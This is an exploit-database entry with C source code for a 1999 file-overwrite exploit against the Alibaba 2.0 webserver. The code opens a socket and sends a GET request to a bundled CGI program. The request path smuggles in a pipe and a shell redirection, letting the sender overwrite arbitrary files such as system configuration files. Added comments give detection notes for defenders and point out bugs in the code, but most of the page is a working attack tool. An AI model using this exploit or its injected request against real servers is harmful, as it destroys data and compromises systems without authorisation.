
Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilities

🗓️ 03 Nov 1999 00:00:00Reported by KerbType 
🔗 www.exploit-db.com👁 38 Views

Alibaba 2.0 webserver CGI vulnerabilities permit unauthorized file access and manipulation.

Code
// source: https://www.securityfocus.com/bid/770/info

Several CGI programs ship with the Alibaba webserver. Many of them do not validate their input, so a request can reference files outside the directories the webserver is meant to expose. As a result, an attacker can view, overwrite, create and delete files anywhere on the server.

/*

 Description: DoS against Alibaba 2.0 WebServer by wildcoyote
 Comments   : Based on advisory by Prizm<[email protected]>
              It is possible to overwrite any file on the remote box!
 Platforms  : Alibaba runs on Win95/98/NT
 Flamez to  : [email protected]

*/

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>

// Request path of the bundled CGI program that the request below is built
// around. Only one definition may be active at a time; per the author, when
// the default program is not present on the server, enable just one of the
// alternatives instead.
// For defenders: these three paths are the bundled programs to audit, remove
// or block on an Alibaba 2.0 install, and the paths to search for in access
// logs.
#define vulnerable_cgi "/cgi-bin/post32.exe"
// #define vulnerable_cgi "/cgi-bin/post16.exe"
// #define vulnerable_cgi "/cgi-bin/get16.exe"


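/*
 * Resolve `host` and open a TCP connection to it on `port`.
 *
 * Returns the connected socket descriptor, or -1 when the name does not
 * resolve to an IPv4 address, the socket cannot be created, or connect()
 * fails. On success the caller owns the descriptor and must close() it;
 * on failure no descriptor is left open.
 */
int 
openhost(char *host,int port) {
   int sock;
   struct sockaddr_in addr;
   struct hostent *he;
   struct protoent *pe;

   he=gethostbyname(host);

   /* Only an IPv4 result that fits in sin_addr may be copied below. */
   if (he==NULL || he->h_addrtype!=AF_INET || he->h_addr_list[0]==NULL)
      return -1;
   if (he->h_length<=0 || (size_t)he->h_length>sizeof(addr.sin_addr))
      return -1;

   /* getprotobyname() returns NULL when no "tcp" entry is found; passing 0
      lets socket() pick the default protocol for SOCK_STREAM instead of
      dereferencing a null pointer. */
   pe=getprotobyname("tcp");
   sock=socket(AF_INET, SOCK_STREAM, pe!=NULL ? pe->p_proto : 0);

   if (sock==-1) return -1;

   /* Zero the whole structure so padding (sin_zero) is not stack garbage. */
   memset(&addr, 0, sizeof(addr));
   memcpy(&addr.sin_addr, he->h_addr_list[0], (size_t)he->h_length);
   addr.sin_family=AF_INET;
   addr.sin_port=htons((unsigned short)port);

   if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
      /* Do not leak the descriptor when the connection fails. */
      close(sock);
      return -1;
   }

   return sock;
}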

/*
 * Write the NUL-terminated string `buf` to descriptor `sock` with a single
 * write() call. The terminator itself is not sent, and the result of
 * write() is not examined, so a short or failed write goes unnoticed.
 */
void 
sends(int sock,char *buf) {
  size_t len=strlen(buf);

  write(sock,buf,len);
}

/*
 * Proof-of-concept driver: connect to host:port with openhost(), format one
 * request line into a stack buffer, send it with sends(), close the socket
 * and print status messages.
 *
 * host - server name, passed to openhost()
 * file - path string inserted into the request line
 * port - TCP port, passed to openhost()
 *
 * Calls exit(-1) when the connection cannot be opened. No response is ever
 * read from the server, so the final message reports an assumption, not a
 * confirmed result.
 *
 * Detection note: the request target is the CGI path from `vulnerable_cgi`
 * followed directly by a `|` character and a `>` redirection. A request to
 * one of the bundled CGI programs that carries `|` or `>` in the request
 * target is the thing to look for in access logs and to reject at a proxy.
 */
void 
overwrite(char *host, char *file, int port)
{
 /* `i` is declared but never used in this function. */
 int sock,i;
 char buf[512];
 printf("\nAlibaba 2.0 WebServer File Overwrite Xploit by wildcoyote\n\n");
 printf("Trying to connect to %s (%d)....(please wait)\n",host,port);
 sock=openhost(host,port);
 if(sock==-1) {
     printf("- Could not connect -\n");
     printf("Exiting...\n\n");
     exit(-1);
 }
 else printf("Connected to %s (%d)\n",host,port);
 /* NOTE(review): sprintf() is unbounded here. `file` comes straight from the
    command line (see main), so a long argument writes past the 512-byte
    `buf` on the stack. */
 /* NOTE(review): the format string contains the sequence %20 followed by
    `>`, which the printf family parses as a conversion specification rather
    than literal text. The bytes this call produces are therefore not defined
    by the C standard, and a detection signature should not be keyed on an
    exact byte string taken from this listing. */
 sprintf(buf,"GET %s|echo%20>%s\n\n",vulnerable_cgi,file);
 printf("Oh k! Trying to overwrite the file...\n");
 sends(sock,buf);
 close(sock);
 printf("All done, the file was *probably* overwrited ;)\n");
 printf("Send flamez to [email protected], *Enjoy*...\n\n");
}

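/*
 * Entry point: parse <host> <path> [port] and pass them to overwrite().
 *
 * With fewer than two arguments the usage text is printed and 1 is
 * returned. The optional third argument must be a decimal TCP port in the
 * range 1..65535; anything else is rejected with a message and a return
 * value of 1 instead of being passed through atoi(), which cannot report
 * bad input. The port defaults to 80. Returns 0 after overwrite() returns.
 */
int
main(int argc, char *argv[])
{
 int port=80;

 if (argc<3) {
    printf("\nAlibaba 2.0 WebServer File Overwrite Xploit by wildcoyote\n\n");
    printf("Sintaxe: %s <host> <path to file to overwrite> [port - default 80]\n",argv[0]);
    printf("Warning: Path to file must be a valid DoS path :)\n");
    printf("Evil Example: %s www.vulnerable.alibaba.com c:\\windows\\win.ini\n",argv[0]);
    printf("Send flamez to [email protected], *Enjoy*...\n\n");
    return 1;
 }

 if (argc>3) {
    char *end;
    long value;

    /* strtol() reports non-numeric and out-of-range input; atoi() does not. */
    errno=0;
    value=strtol(argv[3],&end,10);
    if (errno!=0 || end==argv[3] || *end!='\0' || value<1 || value>65535) {
       printf("Invalid port: %s\n",argv[3]);
       return 1;
    }
    port=(int)value;
 }

 overwrite(argv[1],argv[2],port);
 return 0;
}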
